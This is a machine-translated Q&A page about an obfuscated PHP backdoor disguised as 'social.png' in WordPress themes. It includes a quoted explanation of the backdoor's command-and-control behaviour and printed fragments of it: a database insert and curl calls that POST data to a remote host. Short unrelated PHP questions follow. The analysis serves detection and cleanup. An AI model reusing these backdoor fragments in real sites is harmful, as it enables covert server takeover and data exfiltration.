在许多wordpress主题中，奇怪的false social.png的目的是什么 - php

我已经从网站上下载了一些Wordpress主题，并且发现social.png文件包含一个奇怪的包含。查看此文件，这不是真正的png文件，而是一个包含难以理解的混淆代码的php脚本，对于从其他网站分发的许多wordpress插件也是如此。

文件大小为45 kb，并具有此哈希3FFC93695CA3C919F36D52D07BDB5B198E7C6D63

有人对这个文件的功能有想法吗？

THIS是文件

参考方案

根据this forum post：

基本上，这是一个远程外壳回调，它使用公钥加密仅允许黑客在您的服务器上运行代码。它使用嵌入式密钥生成一个按安装的RSA密钥对，并将其上传到命令服务器（该服务器具有预填充的列表，但可以从其他受感染的主机动态更新以避免被关闭），并且还通过功能（已启用评估/执行功能，服务器信息）并将其通过电子邮件发送到文件中找到的电子邮件列表。
它使用的是Wordpress的配置系统来存储其数据，因此请在数据库中查找名为WP_CLIENT_KEY的设置键，该设置键看起来像一堆乱码。
一旦激活，漏洞利用程序将获取一系列要在服务器上评估的命令-可能会有更多的shell或漏洞利用，并将字符串注入页面页脚。这些字符串可能是blackhat SEO垃圾邮件，但它还会注入与其联系的命令和控制服务器列表-因此，任何其他受感染的站点都将使用您的服务器来查找其他服务器。

正如我在评论中指出的那样，该脚本将更新数据并将其存储在WP数据库中：

$AKorMlJxhsFuVmuppepc->setQuery("INSERT INTO #__options(option_name, value) values ('{$zgWyMIVCeKwSmjusORA}' , '{$ytnxJjQqCvGdNRBKCigc}')");
...

正如论坛帖子所指出的那样，该脚本是供脚本自己访问的。该脚本还通过shell POST请求将数据（可能是公钥）发送到指定的服务器：

curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_URL, "http://$gXNjWLFkUQOugyREMXKv");
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_FOLLOWLOCATION, true);
if (isset($WbKPQMoSbMZkXUeYKXRI)) {
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRI);
}

无论脚本的确切用途是什么，都应删除该脚本的所有引用以及attempt to rid yourself of the script completely。

如何使用PHP创建AJAX通知来通知好友请求 - php

我正在寻找创建AJAX咆哮或很酷的AJAX Web 2.0通知，我知道PHP，并且希望通知用户当$ username接受朋友请求时，则在AJAX中发出通知咆哮通知用户已接受他们的朋友请求。 参考方案 您所描述的是通过使用Push technology来完成的，其中涉及的内容不止PHP。在任何情况下，都将使用您良好的SQL查询来检查请求的状态并将信息提供给一种…

PHP-将日期插入日期时间字段 - php

我已在数据库中使用datetime字段存储日期，使用PHP将“今天的日期”插入该字段的正确方法是什么？干杯， 参考方案 我认为您可以使用php date()函数

PHP-如何获取类的成员函数列表？ - php

如果我知道班级的名字。有没有办法知道类的成员函数列表？ 参考方案 get_class_methods()是你的朋友

PHP-我们应在会话中包含哪些数据？ - php

这是一个初学者的问题...在网站中，会话中应该包含或不应该包含什么类型的数据？我了解我不应该包含任何需要保持安全的信息。我对编程最佳实践更感兴趣。例如，有可能在会话中包括一些数据，否则这些数据将作为依赖项注入从一个页面发送到另一个页面。这不等于创建全局变量吗？一般来说，哪种数据在会话表中已经存在或没有？谢谢，JDelage 参考方案 您应该将会话视为一次写入…

php ziparchive类源代码 - php

Improve this question 我如何获取ziparchive类本身的源代码。 参考方案 假设您在谈论PHP ZipArchive class：下载PHP source code并查找适当的文件。如果您希望源代码是PHP代码，您可能会感到失望，因为源代码是用C语言编写的。或者，也可以在PHP Github Development Reposito…